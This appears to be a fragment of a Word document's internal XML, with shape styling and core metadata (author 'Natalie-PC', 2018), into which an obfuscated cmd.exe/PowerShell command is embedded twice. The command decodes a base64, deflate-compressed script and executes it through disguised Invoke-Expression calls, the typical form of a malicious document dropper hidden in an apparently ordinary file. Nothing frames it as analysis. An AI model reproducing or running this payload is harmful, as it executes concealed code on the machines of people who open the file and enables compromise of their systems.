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685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-904875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MD c:\wINDOwS\syStEm32\Cmd.exe   /C  "SEt   iPaof= ^&amp; ( $SHeLLiD[1]+$SHEllid[13]+'x')( NEw-ObjeCt  iO.compreSsIOn.DefLAteSTream([SYstEm.iO.MeMOrYstREAm] [sYStEM.CONvERT]::FRoMBAsE64striNg('PZBda8IwGIX/Si8KUZzJ0LkPQ8F94Ow+3GC64dhNmr6tsTEJaWyt4n9fK3O373l43sPx38IkUFB2dbQC7rwpOPwF0b0UoBz178IyQEvnzJCQ1DDM9RobR/Q6k7vHXvY8+sskMKvwCqytthvMFeE25b2L+JTnEsBUUU1xC8wJrfLGRQZqvuGf/eLEJdVOZAxvlDAa5xmJmWMkBU1YWvchJSvIq33/rha3/591waSEWFvMJRk8za8mk+u8P0P4w0jhWmiE2tR3u4UXeOjm8hxRfzxLAh9UMXSwNh30gzpN3kEYtoBoouuGfNnyp/LFE8prNmjvna32fr0VftClkprFYyHhyJx5jbBNQ1XoDLphLT1eaFR7MnrgzPHl/nD4BQ==') , [sYsTEM.io.comPRessIon.comPressIoNMODe]::decoMPress ) ^| FOreacH{ NEw-ObjeCt  Io.sTREaMreadeR($_,[SYsTEm.teXT.ENCoDiNG]::aSCII )}^|FoReACh{ $_.rEAdtoeNd() }) &amp;&amp;  poWErShelL     SET-vARiABlE  (  'F31'  + 'K'  ) ([tYpe](\"{2}{3}{0}{1}\" -f 'iRonMEN','T','e','Nv' ) ) ;  ${ExeCUtIONContEXT}.\"INvo`kE`ComMand\".\"i`NvO`K`esCRiPt\"(  (   ( vArIaBLE ('F31' +  'k' ) ).VALUe::( \"{3}{2}{4}{5}{1}{0}\" -f'E','abL','ronM','geteNVi','eNT','varI' ).Invoke(( \"{1}{0}\"-f'f','iPAO'  ),(  \"{0}{1}{2}\"-f 'Pr','OCeS','S' ))  )   )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71.25pt;mso-position-vertical-relative:text;margin-left:-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MD c:\wINDOwS\syStEm32\Cmd.exe   /C  "SEt   iPaof= ^&amp; ( $SHeLLiD[1]+$SHEllid[13]+'x')( NEw-ObjeCt  iO.compreSsIOn.DefLAteSTream([SYstEm.iO.MeMOrYstREAm] [sYStEM.CONvERT]::FRoMBAsE64striNg('PZBda8IwGIX/Si8KUZzJ0LkPQ8F94Ow+3GC64dhNmr6tsTEJaWyt4n9fK3O373l43sPx38IkUFB2dbQC7rwpOPwF0b0UoBz178IyQEvnzJCQ1DDM9RobR/Q6k7vHXvY8+sskMKvwCqytthvMFeE25b2L+JTnEsBUUU1xC8wJrfLGRQZqvuGf/eLEJdVOZAxvlDAa5xmJmWMkBU1YWvchJSvIq33/rha3/591waSEWFvMJRk8za8mk+u8P0P4w0jhWmiE2tR3u4UXeOjm8hxRfzxLAh9UMXSwNh30gzpN3kEYtoBoouuGfNnyp/LFE8prNmjvna32fr0VftClkprFYyHhyJx5jbBNQ1XoDLphLT1eaFR7MnrgzPHl/nD4BQ==') , [sYsTEM.io.comPRessIon.comPressIoNMODe]::decoMPress ) ^| FOreacH{ NEw-ObjeCt  Io.sTREaMreadeR($_,[SYsTEm.teXT.ENCoDiNG]::aSCII )}^|FoReACh{ $_.rEAdtoeNd() }) &amp;&amp;  poWErShelL     SET-vARiABlE  (  'F31'  + 'K'  ) ([tYpe](\"{2}{3}{0}{1}\" -f 'iRonMEN','T','e','Nv' ) ) ;  ${ExeCUtIONContEXT}.\"INvo`kE`ComMand\".\"i`NvO`K`esCRiPt\"(  (   ( vArIaBLE ('F31' +  'k' ) ).VALUe::( \"{3}{2}{4}{5}{1}{0}\" -f'E','abL','ronM','geteNVi','eNT','varI' ).Invoke(( \"{1}{0}\"-f'f','iPAO'  ),(  \"{0}{1}{2}\"-f 'Pr','OCeS','S' ))  )   )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4:00Z</dcterms:created>
  <dc:creator>Natalie-PC</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-06T12:14:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>